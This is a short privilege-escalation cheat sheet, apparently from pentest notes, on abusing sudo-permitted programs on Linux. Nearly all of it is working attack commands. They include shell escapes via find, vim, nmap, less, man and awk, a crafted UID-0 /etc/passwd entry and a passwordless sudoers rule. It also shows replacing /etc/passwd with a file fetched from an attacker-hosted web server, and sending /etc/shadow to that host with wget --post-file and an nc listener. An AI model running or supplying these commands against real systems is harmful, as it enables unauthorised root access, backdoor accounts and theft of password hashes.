Exploiting SUDO Users

To Exploiting sudo user u need to find which command u have to allow.

sudo -l

Escalate Privilege to root user using command:

sudo find /etc/passwd -exec /bin/sh \;

sudo find /bin -name nano -exec /bin/sh \;

sudo vim -c '!sh'

# Oldway
sudo nmap --interactive
nmap> !sh
sh-4.1#

# Latest way
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

sudo man man
# press !sh and hit enter

sudo less /etc/hosts
# press !sh and hit enter

sudo more /etc/hosts
# press !sh and hit enter

 sudo awk 'BEGIN {system("/bin/sh")}'

sudo nano /etc/passwd
sudo nano /etc/sudoers

Add this line in /etc/passwd to order to add the user as root privilege.

user:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash

su user

Edit the entry for user user to have access to all commands as sudo without a password:

user ALL=(ALL) NOPASSWD:ALL
user ALL = (ALL:ALL) ALL

Copy Target’s /etc/passwd file to attacker machine
modify file and add a user in passwd file which is saved in the previous step to the attacker machine.
append this line only => ayed:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
host that passwd file to using any web server.
```
sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd
su ayed
```
- Note: if u want to dump file from a server like a root’s ssh key, Shadow file etc.

sudo wget --post-file=/etc/shadow 192.168.56.1:8080

nc –lvp 8080

sudo apache2 -f /etc/shadow

Last updated 2 years ago